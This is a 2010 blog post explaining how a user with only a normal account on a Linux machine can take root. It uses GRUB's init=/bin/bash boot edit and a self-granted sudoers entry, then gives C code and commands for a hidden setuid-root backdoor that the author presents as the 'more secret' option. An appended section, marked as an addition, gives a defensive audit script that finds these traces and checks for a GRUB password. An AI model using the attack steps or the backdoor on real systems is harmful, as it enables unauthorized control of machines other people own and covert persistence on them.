Friday, June 18, 2010

How to hack the Linux box to get root permission

You have a Linux box, but only a normal user account on it. You want to hack this box and get root permission. Here is one way to do it.

Note: the following procedure requires console access at boot time, and it was tested only with the GRUB boot loader, never with LILO.

1. Reboot the machine.
2. Before it boots into Linux, press a key to bring up the boot loader menu.
3. In GRUB, press "e" to edit the boot entry.
4. Append "init=/bin/bash" (or "init=/bin/sh") to the end of the kernel line.
5. Press Enter, then press "b" to boot.
6. The system boots straight into a root shell, with no login.
7. Bingo. You can hijack the system now. :-)
8. To be a good citizen, I would recommend adding your own user id to /etc/sudoers with the "visudo" command.
Then you can "sudo bash" to get a shell with root permission. You still don't know the root password, but you have root permission. The downside is that root can tell it was you who hacked the system by checking /etc/sudoers.
9. To do something more secret, you can use a suid program that executes your script as root.

Here is a C program; build it and set the suid bit.

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

int main()
{
   /* switch to uid 0; this only succeeds when the binary is owned by
      root and carries the setuid bit (chmod 4755 below) */
   setuid(0);
   /* run the script with the privileges obtained above */
   system("/tmp/myscript.sh");

   return 0;
}

10. Save the program as t.c
11. gcc -o go t.c
12. chmod 4755 go

Now you can put anything you want in /tmp/myscript.sh and run go; go executes /tmp/myscript.sh as root. Wow!
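Added defender-side example, not part of the original post: a small POSIX shell audit for the traces this procedure leaves behind, namely a setuid binary outside an allow-list (like go) and a sudoers rule for a personal account, plus a check that grub.cfg defines superusers so that editing a boot entry needs a password. It assumes a GNU/Linux userland and runs against constructed sample files; the function names, allow-list format and sample user "alice" are my own.

```shell
#!/bin/sh
# Added audit script (not from the original post). Finds the footprints of
# steps 8-12 and checks the GRUB mitigation for step 3.
# Assumes a GNU/Linux userland (find, ls, awk, grep, mktemp).

# Print "mode owner path" for every setuid file under $1 that is not listed
# (one absolute path per line) in the allow-list file $2.
find_unexpected_setuid() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null | while IFS= read -r f; do
        grep -qxF -e "$f" "$2" && continue
        ls -ld "$f" | awk -v p="$f" '{ print $1, $3, p }'
    done
}

# Print sudoers rules whose subject is neither root nor a standard admin
# group. A rule added with visudo for a personal account shows up here.
find_unexpected_sudoers() {
    grep -vE '^[[:space:]]*(#|$|Defaults)' "$1" |
        awk '$1 != "root" && $1 != "%sudo" && $1 != "%wheel" && $1 != "%admin"'
}

# Exit 0 if the grub.cfg in $1 defines superusers (boot-entry edits need a
# password), 1 otherwise.
grub_password_set() {
    grep -q '^set superusers=' "$1"
}

# Constructed sample tree (empty files, no real binaries) so the audit runs
# offline; prints the directory it created.
make_sample() {
    d=$(mktemp -d)
    mkdir -p "$d/bin" "$d/tmp"
    : > "$d/bin/passwd"; chmod 4755 "$d/bin/passwd"   # legitimate setuid file
    : > "$d/tmp/go";     chmod 4755 "$d/tmp/go"       # the binary from step 12
    printf '%s\n' "$d/bin/passwd" > "$d/allow.txt"
    printf '%s\n' '# User privilege specification' 'root ALL=(ALL:ALL) ALL' \
        '%sudo ALL=(ALL:ALL) ALL' 'alice ALL=(ALL) ALL' > "$d/sudoers"
    printf '%s\n' 'set superusers="admin"' 'menuentry "Linux" {' '}' > "$d/grub.cfg"
    echo "$d"
}

if [ "${1:-}" = "--demo" ]; then
    s=$(make_sample)
    find_unexpected_setuid "$s" "$s/allow.txt"
    find_unexpected_sudoers "$s/sudoers"
    grub_password_set "$s/grub.cfg" && echo "grub: superusers set"
fi
```

On a real host, run the first two functions against / with an allow-list built from a known-good image and against /etc/sudoers (as root), and the third against /boot/grub/grub.cfg.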

Don't do anything stupid that gets you into trouble. This is just a demonstration of a hacking technique on Linux systems.